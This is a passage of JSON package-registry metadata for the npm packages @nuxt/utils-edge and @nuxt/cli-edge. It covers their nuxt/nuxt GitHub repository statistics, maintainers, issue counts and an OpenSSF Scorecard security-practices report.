Framework.","archived":false,"fork":false,"pushed_at":"2026-02-13T11:08:58.000Z","size":134344,"stargazers_count":59568,"open_issues_count":935,"forks_count":5524,"subscribers_count":784,"default_branch":"main","last_synced_at":"2026-02-13T11:29:52.149Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-02-13T11:06:01.000Z","dependencies_parsed_at":"2024-12-25T13:30:54.580Z","dependency_job_id":"22cffcce-6e0a-4001-b86c-b81e60fdf77b","html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":311,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29425778,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-13T22:20:51.549Z","status":"ssl_error","status_checked_at":"2026-02-13T22:20:49.838Z","response_time":78,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":62,"last_synced_at":"2026-01-11T15:52:13.608Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":116453,"followers":4523,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2026-01-11T15:52:13.608Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[]},"repo_metadata_updated_at":"2026-02-14T00:34:55.439Z","dependent_packages_count":12,"downloads":21432,"downloads_period":"last-month","dependent_repos_count":433,"rankings":{"downloads":1.003982712842381,"dependent_repos_count":0.8393975972868886,"dependent_packages_count":1.739614067411015,"stargazers_count":0.16519994711762306,"forks_count":0.5466428312764772,"docker_downloads_count":1.6186636805636194,"average":0.9855834727496674},"purl":"pkg:npm/%40nuxt/utils-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/utils-edge","docker_dependents_count":1,"docker_downloads_count":8,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/utils-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/utils-edge/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs","https://github.com/sponsors/nuxt"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T19:00:21.069Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":319,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":64,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Futils-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Futils-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Futils-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Futils-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Futils-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Futils-edge/codemeta","maintainers":[{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2026-02-14T00:33:48.969Z","updated_at":"2026-02-14T00:33:48.969Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-12-13T16:28:28.634Z","updated_at":"2023-12-13T16:28:28.634Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096085,"name":"@nuxt/cli-edge","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":1843,"first_release_published_at":"2018-10-17T22:29:12.709Z","latest_release_published_at":"2020-06-29T00:22:38.776Z","latest_release_number":"3.0.0-26556502.75dd90f2","last_synced_at":"2026-03-30T21:05:31.619Z","created_at":"2022-04-08T10:39:22.224Z","updated_at":"2026-03-30T21:05:31.619Z","registry_url":"https://www.npmjs.com/package/@nuxt/cli-edge","install_command":"npm install @nuxt/cli-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"3.0.0-26556502.75dd90f2","latest":"2.18.2-28661769.e265ef3"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-02-13T11:08:58.000Z","size":134344,"stargazers_count":59568,"open_issues_count":935,"forks_count":5524,"subscribers_count":784,"default_branch":"main","last_synced_at":"2026-02-13T11:29:52.149Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-02-13T11:06:01.000Z","dependencies_parsed_at":"2024-12-25T13:30:54.580Z","dependency_job_id":"22cffcce-6e0a-4001-b86c-b81e60fdf77b","html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":311,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and 